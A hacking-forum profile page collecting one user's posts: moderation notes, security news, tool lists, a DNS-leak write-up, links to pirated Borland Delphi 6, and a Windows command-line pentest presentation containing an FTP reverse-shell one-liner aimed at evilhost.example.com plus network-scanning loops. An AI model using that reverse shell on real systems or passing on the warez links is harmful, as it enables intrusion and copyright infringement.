-
Posts
3972 -
Joined
-
Last visited
-
Days Won
22
Everything posted by begood
-
[A+] oclHashcat - MultiGPU, Multi hash password cracker
begood replied to begood's topic in Programe hacking
ai driverele CUDA up-to-date ? btw exista si Cryptohaze.com si asta se aproprie de performantele lui oclhashcat -
Borland Delphi 6 Enterprise Edition Download : part1 : http://www.multiupload.com/YYA1ZBPMM5 http://rapidshare.com/files/383812794/Borland_Delphi_6_Enterprise_Edition_parts.part1.rar.html http://hotfile.com/dl/41390358/5289202/Borland_Delphi_6_Enterprise_Edition_parts.part1.rar.html http://uploading.com/files/cedcd28c/Borland%2BDelphi%2B6%2BEnterprise%2BEdition_parts.part1.rar/ http://www.megaupload.com/?d=VTPI4WLV http://www.2shared.com/file/kVq24ibo/Borland_Delphi_6_Enterprise_Ed.html part2 : http://www.multiupload.com/BXHBXQL27B http://rapidshare.com/files/383815761/Borland_Delphi_6_Enterprise_Edition_parts.part2.rar.html http://depositfiles.com/en/files/okxk8kg53 http://hotfile.com/dl/41391361/b23275a/Borland_Delphi_6_Enterprise_Edition_parts.part2.rar.html http://www.zshare.net/download/757441565e8aaae3/ http://uploading.com/files/eb8mfm6a/Borland%2BDelphi%2B6%2BEnterprise%2BEdition_parts.part2.rar/ http://www.2shared.com/file/NCa0ZKWm/Borland_Delphi_6_Enterprise_Ed.html part3 : http://www.multiupload.com/0TEVRERKWM http://www.megaupload.com/?d=2UXXJJ26 http://www.zshare.net/download/75744603c5dd2b93/ http://rapidshare.com/files/383820047/Borland_Delphi_6_Enterprise_Edition_parts.part3.rar.html http://hotfile.com/dl/41393408/df347c4/Borland_Delphi_6_Enterprise_Edition_parts.part3.rar.html http://www.2shared.com/file/arzC_Q6V/Borland_Delphi_6_Enterprise_Ed.html part4 : http://www.multiupload.com/A8E885X530 http://rapidshare.com/files/383820421/Borland_Delphi_6_Enterprise_Edition_parts.part4.rar.html http://www.zshare.net/download/757446734f563e82/ http://www.megaupload.com/?d=MZTIIF8W http://hotfile.com/dl/41393672/50b1233/Borland_Delphi_6_Enterprise_Edition_parts.part4.rar.html http://www.2shared.com/file/Vx59addW/Borland_Delphi_6_Enterprise_Ed.html Size: 328 MB
-
e deasupra topul. top 5.
-
fara HACKING REQUESTS. closed and trashed.
-
I’ve been spending a lot of time lately working with packet captures. I’ve been stringing together a long list of silly one-liners to make a very rough pcap vulnerability scanner of sorts. This is one of those one-liners. One of the main things I first hunt for in network traffic is sensitive data leaving the network. Depending on the client, this could range anywhere from Social Security Numbers to Player Tracking Numbers on gaming networks. I usually use grep and ngrep for some initial recon. Here, we break open our pcap file with ngrep and feed it to grep. Then, grep looks for the typical SSN regex xxx-xx-xxxx where x= any number 0-9. $ ngrep -I inet.pcap | grep '[0-9]\{3\}-[0-9]\{2\}-[0-9]\{4\}' GET /www.engadget.com/media/2010/03/cisco-valet-2010-03-3019-43-29-rm-eng_thumbnail.jpg http://www.blogcdn.com/www.engadget.com/media/2010/03/cisco-valet-2010-03-3019-4 GET /www.engadget.com/media/2010/03/cisco-valet-2010-03-3019-43-12-rm-eng_thumbnail.jpg http://www.blogcdn.com/www.engadget.com/media/2010/03/cisco-valet-2010-03-3019-4 GET /www.engadget.com/media/2010/03/cisco-valet-2010-03-3019-43-01-rm-eng_thumbnail.jpp CO%20Update%288-57-423458293.emlRe%20Company%20Meeting l.com/exchange/john.doe/Deleted%20Items/CP%20Update%288-57-423458293.eml As you can see in the example above – there are some (all) false positives. This particular pcap is hitting on dates and .eml names because they follow the regex we are looking for. On larger pcaps with alot of Internet traffic, I usually pipe the output to a text file and get to work stripping out all the GET requests and things we just arent interested in for the task at hand. I’ve also used the Spider tool from Cornell University with much success. Finding Social Security Numbers in packet captures with grep and ngrep Security Aegis
-
Microsoft is killing off its newsgroups and encouraging users to move to forums instead. The software giant has over 2,000 public groups covering its various products, as well as 2,200 private groups for the likes of Microsoft resellers. But from June 2010 these will be moved to revamped forums on TechNet, MSDN and Microsoft Answers. Microsoft said: "Forums offer a better spam management platform that will improve customer satisfaction by encouraging a healthy discussion space." Apart from spam Microsoft said it was appealing that "we own the app" and could continue to develop new back-end services. These include support for Questions and Answers flagged by authoritative users, subscription to RSS or notification services and voting for useful posts. Forums also last longer - newsgroup posts were typically deleted after 90 days. Although Microsoft admitted there would be some cost-savings from the move it said visitors to newsgroups had fallen by a half over the last fiscal year. It will post notices in the groups it closes in a progressive manner, starting with the least-used groups. More from Microsoft here. Microsoft kills off newsgroups ? The Register
-
As more of our work, play, and business is conducted online it becomes increasingly important to use a diverse set of strong passwords. This week we take a look at the five best password managers to keep your passwords organized. Photo a composite of images by melodi2 and nintaro. You can't afford to use the same password for everything, nor do many of us have the recall skills to keep dozens and dozens of complex alphanumeric passwords stored in perfect order in our memories. A password manager is the compromise between using a few you can remember and risking forgetting some if you use too many complex passwords. The following five tools will help you build a strong password set and securely store it so you're never stuck using the same old password for fear of forgetting it. KeePass (Windows/Mac/Linux/Mobile, Free) If you're extra paranoid about security it's tough to go wrong with an open-source solution knowing that you (or the concerned community) can pore over the code. KeePass is open-source, free, and available for everything from a portable Windows installation to an implementation for iPhones, PocketPCs, and Android phones. KeePass supports a variety of features including automatic password generation, field and icon customization, secure notes, and login and password entry through clipboard copying, drag and drop, or auto fill-in. KeePass supports a wide range of import and export formats as well as printing for hard copy backup or secure offline storage. If you're interested in KeePass you'll definitely want to check out our guide to the eight best KeePass plug-ins and how to sync your KeePass keyring with Dropbox. Roboform (Windows, Basic: Free/Pro: $29.95) RoboForm isn't going to win any awards for a stunning GUI, but it has gathered accolades for ease of use and tight integration with popular web browsers. You can set RoboForm to not only automatically log you into existing services but quickly fill out forms to register for new ones with automatic fill in of names and email addresses. RoboForm included encrypted notes, random password generation, and the ability to print hard copy backups of your password lists for storage in a fire safe or other secure location. LastPass (Windows/Mac/Linux/Mobile, Basic: Free/Premium: $1/month) LastPass is one of the newest password managers on the market but it has quickly gained a following for ease of use, hiccup-free integration across operating systems, browsers, and mobile platforms, and an extremely reasonable premium-model that costs only a $1 a month. Because LastPass is available for every major operating system and phone platform it's difficult to imagine a combination of operating system, web browser, and phone it doesn't cover, meaning you'll use your password manager more. LastPass has gone to extraordinary lengths to cover the bases when it comes to running a web-connected password management service including the ability to use two-layer authentication and setting up one-time use passwords for those times you want to access your online password database but you're not sure if the connection you're on is really secure. For a closer look at LastPass check out our guide here. SplashID (Windows/Mac/Mobile, Desktop: $19.95/Mobile:$9.95) SplashID is a multi-platform password manager. Available on the desktop for Windows and Mac OS X it also syncs to mobile versions on the iPhone, Android, Blackberry, Palm OS, Windows Mobile, and S60 platforms. SplashID uses AES and Blowfish encryption, an automatic password generator, custom icons for entries in your keyring, advanced search, and the ability to sync and securely email your passwords to other SplashID users. SplashID supports heavily customizable entry fields so you can easily make specialized entry types for storage of non-password data (confidential records, bank information, insurance information, and more). SplashID offers a 30 day trial. 1Password (Mac OS X/iPhone, Desktop: $39.95/iPhone:$14.95) 1Password is a Mac-centric password manager with support for syncing to your iPhone and iPad through the 1Password mobile suite. Not only can you organize and sync passwords, but also software licenses and files—great for storing things like scanned copies of your important documents when traveling. 1Password supports customization of login icons and thumbnails, integration with Evernote and Safari, and a tag-based system for easy login organization. While this is completely irrelevant to the quality of a good password manager insofar as the security of the passwords is concerned, it's worth noting that 1Password sports the most attractive and polished user interface of any password manager we've reviewed. Five Best Password Managers - Password Managers - Lifehacker
-
@gopo suferi ? adu dovezi. daca faci acuzatii de genul, si nu aduci dovezi vei avea ban permanent.
-
Google has released a free online tutorial that gives developers the chance to play the role of malicious hacker by exploiting real security bugs in a mock web application. The codelab is premised on a "small, cheesy web application" dubbed Jarlsberg that is chock-full of bugs that can be exploited to take down webservers, perform remote code-execution attacks, and spring information-disclosure leaks. It can be downloaded and run on a local machine to teach developers firsthand the perils of insecure coding. Google's "Web Application Exploits and Defenses" codelab can be used in a black-box setting, in which hackers aren't privy to the source code of the application they're attacking, or a white-box setting, in which they are. Jarlsberg is written in Python, although hackers, of course, need not be versed in the language in order to make mincemeat of the application. http://rstcenter.com/forum/22352-jarlsberg-want-beat-hackers-their-own-game.rst https://www.hackinthebox.org/modules.php?op=modload&name=News&file=article&sid=36142
-
Web Developer Toolbar - "The Web Developer extension adds a menu and a toolbar with various web developer tools. " https://addons.mozilla.org/en-US/firefox/addon/60 XSS me - "XSS-Me is the Exploit-Me tool used to test for reflected XSS vulnerabilities. " https://addons.mozilla.org/en-US/firefox/addon/7598 No Script - "Allow active content to run only from sites you trust,and protect yourself against XSS and Clickjacking attacks." https://addons.mozilla.org/en-US/firefox/addon/722 SQLinject me, "SQL Inject-Me is Firefox Extension used to test for SQL Injection vulnerabilities. " https://addons.mozilla.org/en-US/firefox/addon/7597 Hackbar, "Simple security audit / Penetration test tool. " - https://addons.mozilla.org/en-US/firefox/addon/3899 Tamper data, "Use tamperdata to view and modify HTTP/HTTPS headers and post parameters... " - https://addons.mozilla.org/en-US/firefox/addon/966 Force TLS, "Force-TLS allows web sites to tell Firefox that they should be served via HTTPS in the future; this helps secure you from accidentally negotiating an insecure session with certain sites." https://addons.mozilla.org/en-US/firefox/addon/12714 Show Ip - https://addons.mozilla.org/en-US/firefox/addon/590 "Show the IP address(es) of the current page in the status bar. It also allows querying custom information services by IP (right mouse button) and hostname (left mouse button), like whois, netcraft." SiteAdvisor - "SiteAdvisor software adds safety ratings to your browser and search engine results." http://sadownload.mcafee.com/products/SA/IE/upgrade/3.0.1/website/saSetup3.0.1.165.exe FireShark - "Fireshark is a tool, made up of a Firefox plugin and a set of postprocessing scripts that allows you to capture web traffic from the core of your web browser, enabling you to log events and download content to disk for post-process analysis. " http://fireshark.org/#download GreaseMonkey - "Allows you to customize the way a webpage displays using small bits of JavaScript. ... " - https://addons.mozilla.org/en-US/firefox/addon/748 Firebug - "You can edit, debug, and monitor CSS, HTML, and JavaScript live in any web page..." - https://addons.mozilla.org/en-US/firefox/search?q=firebug&cat=all
-
XSS JavaScript Obfuscator generates javascript containing links targeted at a user specificed attack vector. A variety of encoding methods allow the user to sidestep common security measures. Written in XHTML/JavaScript. xss-javascript-obfuscator - Project Hosting on Google Code also check this : http://rstcenter.com/forum/21611-prion-1-1-polymorphic-xss-worm.rst
-
ion cu vaca e belit de begood. ban. inca nu a fost scoasa aceasta versiune.
-
e metasploit futui, ce ai vrea sa arate av-ul ?
-
Thanks to Shahram Karimian from MSK Security for submitting this video about their new technology to SecurityTube. In his own words: "We go through the process of Non-Linear authentication and how it works. Non-Linear Authentication removes the username and password entry fields from the website. This step eliminates the attacks against username and password entry fields such as: SQL Injection, Key Loggers, Phishing, Pharming and Man-in-The-Middle attacks. I will upload a video that goes through the technical aspects as well very soon. If you have any questions on the security or potential attacks please feel free to email me." You can reach him at sk [] msksecurity.com for further queries. Info about them: MSK Security is designed to prevent all of the common website and consumer attack mechanisms without the need for complex or cumbersome systems. The patent pending “Non-Linear Authentication Technology” removes the username and password entry fields from the website. This step eliminates the attacks against username and password entry fields such as: SQL Injection, Key Loggers, Phishing, Pharming and Man-in-The-Middle attacks. I always get excited about disruptive technologies which challenge conventional thinking and processes. This seems to be one of them. Visit their site for more details about the technology. They also seem to have a 30 Day Free Trail of their technology, which I am planning to try out very soon. Have a look! Tags: Non linear authentication, SSO, Cloud, SaaS, 2 factor authentication, token, Saas security, cloud security Non Linear Authentication Tutorial
-
Ever wondered where Cisco store their logs? Or what is the IP address for the Facebook development box? Or how a certain big company organize their IP addresses internally? Or where their database server is located? Well, that's easy to find. Just do a quick DNS query to find out: $ host logserver.cisco.com logserver.cisco.com has address 10.86.229.184 $ host dev.facebook.com dev.facebook.com has address 10.8.253.45 $ host oracle.sans.org oracle.sans.org has address 10.10.10.10 $ host intranet.dell.com intranet.dell.com is an alias for intranet.ins.dell.com. intranet.ins.dell.com has address 10.143.5.15 $ host secure.dell.com secure.dell.com is an alias for insideclassic.ins.dell.com. insideclassic.ins.dell.com has address 10.175.233.67Another test. Do you think that Cisco uses git, CVS or SVN? $ host cvs.cisco.com cvs.cisco.com is an alias for total.cisco.com. total.cisco.com has address 171.70.71.26 $ host svn.cisco.com svn.cisco.com has address 10.86.100.70 $ host git.cisco.com git.cisco.com is an alias for data-ibm7.cisco.com. data-ibm7.cisco.com has address 10.93.230.122Maybe all of them? What is happening here, you may ask. These companies are not properly separating their internal and external DNS servers, thus leaking their internal structure to the outside. How bad is that? Well, it makes external attacks much much easier. From DNS cache poisoning to XSS, you can do a lot more when you know where their internal assets are. And they are not alone... Try checking where qa.ebay.com or mx.paypal.com or intranet.real.com are. I would image that such large companies would properly separate their DNS. How did we find this out? Using our scanner: Sucuri Security: Leaking private IP addresses via DNS
-
Chris Clymer, CISSP ChrisClymer.com/articles/hacking_windows Who am I? I'm not an MCP, MCSE, MCTS, MCPD, MCITP, or MCA I'm not even very good at Minesweeper I'm a UNIX geek I love the command line How much you ask? This entire presentation was created by writing out HTML markup by hand in the Vim text editor Why are you getting Windows tips from a UNIX guy? It turns out that for some reason, not every system runs UNIX In fact, the ones we're most concerned about in Information Security are often running Windows (strange!) Bearded UNIX guys need to get cozy in the WIN32 world Windows veterans benefit from learning to better leverage their OS's CLI This presentation could also be called "How I learned to stop installing CYGWIN and love command.exe" Why hack without your tools? You can't always guarantee that you'll have your toolbox available Relying on your tools can limit you You want to impress women with your leet CLI skills The vast majority of the commands I will show you today should work on a typical modern Windows installation Our friend command.exe This lab will focus on command.exe Powershell, VB, and WMIC are all powerful tools...but command.exe is the least common denominator on all Windows platforms You can launch it by going to Start -> Run -> cmd Our Building Blocks Find \i "foo" file - searches through the file "file" for the string "foo". The "\i" makes it case-insensitive Ping -n 5 host - sends 5 ICMP ping packets to host Telnet host port - spawns an interactive telnet session to host. If is specified, this is used instead of the default Telnet port of 21 Command Control and Redirection command1 & command2 - Run command1 and then command2 command1 && command2 - Run command1 only if command2 runs successfully command1 || command2 - Execute command1 only when command2 does NOT run successfully command > "output.txt" - Redirect output from command to the file "output.txt". Create this file if it does not exist. command >> "output.txt" - Concatenate output from command onto the end of file "output.txt" command1 | command2 - Pipe the output of command1 into command2 You can direct the errors from a command using 2> errors.txt System Reconnaissance set - show environment variables net user - show local users net localgroups - show local groups sc query - list running services sc query state= all - list all services wmic process list full - show details on all running processes tasklist /svc - show all running processess and associated services Network Reconnaissance netstat -nao - show all current network activity, including PID's netsh firewall show config - display windows firewall configuration ipconfig /displaydns - systems this host has recently resolved through DNS arp -a - systems on the same subnet this host has recently communicated with nslookup - all purpose DNS query tool Let's Try One Clear your DNS cache: ipconfig /flushdns ipconfig /displaydns should only show your localhost: Let's Try One Now lets add an entry: ping google.com Another ipconfig /displaydns should show the new entry for google.com More on Nslookup nslookup some host - will lookup that host in DNS based on your localhost's DNS configuration nslookup - starts nslookup in interactive mode set type=any - configures nslookup to pull down all DNS information including MX, A, CNAME, NS, and PTR. ls -d example.com - if the server allows it, does a zone transfer of example.com ls -t example.com - will give a list of member servers from the domain Fun with Telnet! Telnet is just an outdated, insecure remote administration tool right? What happens when you telnet to a port other than 21? Turns out many protocols are simple enough to interact with over telnet Telnet can stand in for Netcat for 1-way communication with remote hosts Lets test out some HTTP You won'y be able to see what you're typing once you've started telnet First type GET /index.html http/1.1 and hit return Lets test out some HTTP You should see something like the response below Lets test out some BAD HTTP This time we'll type GET blah This time we get an error page since we're not passing a valid HTTP query. This is often more helpful, as many HTTP servers happily provide useful information in their error pages What about SMTP? Start out by telnetting to a mailserver on port 25: telnet smtp.gmail.com 25 Now that we're talking to the server we'll start the session by typing EHLO and then hitting enter type quit when ready to end the session If you know your SMTP syntax, you can send email this way Telnet isn't the only choice Many default Windows CLI apps can interact with a network Many of these offer shell-like functionality and flexibility These apps can fill your Netcat niche when uploading nc.exe isn't an option Reverse shell using FTP echo OPEN evilhost.example.com > ftp.txt & echo USER haxeduser >> ftp.txt & echo haxedpw >> ftp.txt & echo PUT output.txt >> ftp.txt & echo DELETE commands.txt >> ftp.txt & echo BYE >> ftp.txt & for /L %i in (1,0,2) do (ftp -n -s:ftp.txt & del output.txt & (for /F "delims=^" %j in (commands.txt) do cmd.exe /c %j l>output.txt & del commands.txt) & ping -n 4 127.0.0.1) Explanation of FTP Reverse Shell This command will be run on a compromised host The command will connect to our host "evilhost" as user "haxeduser" and password "haxedpw" Next it will upload the content of "output.txt" to evilhost Finally it will download "commands.txt" from evilhost, and run whatever is inside All of this is done in an infinite loop As long as the commands in "commands .txt" direct their output to "output.txt" evilhost will get the results Lets Talk About Loops FOR /L - these loops are counters: FOR /L %i in (1,1,10) echo "Hello World" - prints "Hello World" 10 times FOR /F - these loops are iterators FOR /F %i IN (foo.txt) DO (echo %i) - prints the content of foo.txt line by line Neat Shell Control Tricks FOR /L %i IN (1,0,2) DO foo - an infinite loop. Counts from 1 to 2 in increments of 0 ping -n 4 127.0.0.1 - effectively "sleep 4". The windows shell has no "sleep" command, so a local ping can stand-in Network Scanning with Ping FOR /L %i in (1,1,255) do @ping -n 1 10.10.10.%i | find "Reply" This command will ping every host from 10.10.10.1 - 10.10.10.255 By using find to parse through the results for "Reply" we only see the hosts which are responding By using @ping we prevent the ping commands themselves from showing in the terminal Reverse DNS Lookups FOR /L %i IN (1,1,255) DO @echo 10.10.10.%i IN: & @nslookup 10.10.10.%i 2>nul | find "Name" Once again we're iterating through all hosts in the 10.10.10.0/24 network This time we will first echo each hosts IP to the terminal Next we'll run the nslookup command for each IP, suppressing both the command and its errors...all we get is the good output! Searching through the results for "Name" gets us the part we care about Other Useful Commands type - show the contents of a file openfiles /local on - enable openfiles logging(requires reboot) openfiles /query /v - show details on all open files reg query [KeyName] - display value of registry key [KeyName] net use - mount fileshare Resources "Pen-Test Ninjitsu: Part 1" - Core Security Technologies "Built-in Windows Commands to Determine if a System has been Hacked" - Built-in Windows commands to determine if a system has been hacked "Nslookup and DNS Zone Transfers" - nslookup and DNS Zone Transfers SANS 560 Network Penetration Testing and Ethical Hacking - Ed Skoudis SANS: Computer Security Training, Network Security Research, InfoSec Resources Windows Command Line Second Edition - William Stanek (Microsoft Press) "Creating a Remote Command Shell using Default Windows Command Line Tools" - Kevin Bong, SANSFire 2008 SANS 560 If you found this lab useful, I strongly reccomend taking Ed Skoudis's SANS 560 course Ed is the best resource I have found for this sort of usage of the Windows CLI Much of this lab was based on my experience taking the 560 course Ed's 1-day Windows Scripting course covers this material as well Plus he's got much better war stories than I do! Hacking From the Windows Command Line
-
sigur era razor, am verificat.
-
[A+] oclHashcat - MultiGPU, Multi hash password cracker
begood replied to begood's topic in Programe hacking
nu. ai tabele rainbow pentru primele 7 litere din parola, restul bagi brute. mscache update : l-am gasit http://rstcenter.com/forum/15796-cacheebr-ms-cache-password-brute-forcer.rst -
razor, ban.
-
oclHashcat oclHashcat is a free gpu supported hashcracking tool. Features * Free * Multi-GPU * Multi-Hash * Linux & Windows native binaries * Uses OpenCL * Fastest multihash MD5 cracker on NVidia cards * Fastest multihash MD5 cracker on ATI 5xxx cards * Supports wordlists (not limited to Brute-Force / Mask-Attack) * Can mix wordlists with Mask-Attack to emulate Hybrid-Attacks * Runs very cautious, you can still watch movies while cracking * Number of workload can be configured (like -n in hashcat) * Supports pause / resume * Supports huge numbers of hashes (4 million and more) * Able to work in a distributed environment * Includes hashcats entire rule engine to modify wordlists on start * ... and much more Algorithms * MD5 * md5(md5($pass)) * md5(md5($pass).$salt) * MD4 * NTLM Tested OS * Windows XP 32bit * Windows XP 64bit * Windows Vista 64bit * Windows 7 64bit * Debian Lenny 32bit * Ubuntu 9.02 64bit * Ubuntu 9.10 64bit Tested GPU * 8500gt * 8700mgt * 8800gt * 8800gts * 9600gt * 9800gt * gt240 * gtx260 * gtx280 * gtx285 * gtx295 * hd4850 * hd4870 * hd5770 * hd5870 Check the website to download it: oclHashcat - advanced password recovery irc://irc.rizon.net/hashcat
-
Welcome to Lockpicking Forensics LockpickingForensics.com is dedicated to the science and study of forensic locksmithing. This site has information that will help: Determine method of entry Identify tool marks and techniques Determine skill level of attacker(s) Preserve, collect, and protect evidence Maintain a clean forensic workspace Organize and write investigative reports Get started: Normal Wear | Lockpicking | Key Bumping | Forensic Investigation Use the links on the left to familiarize yourself with the site. All images on the site can be clicked for an englarged, captioned version. For more information on locks, lockpicking, and physical security, visit LockWiki.com Lockpicking Forensics - Forensic & Investigative Locksmithing, Lockpicking, and Locksport
-
asta-i link securitate ? trash + warn. treci pe t.ro si fa acolo reclama.
-
la mine nu intra nici NSA ) acum serios vorbind, erau ca exemplu, programelea acelea le-am folosit de-a lungul vietii si le consider de prima clasa, dar n-am treaba saptamanal ..nici macar lunar cu mai mult de 5 din ele.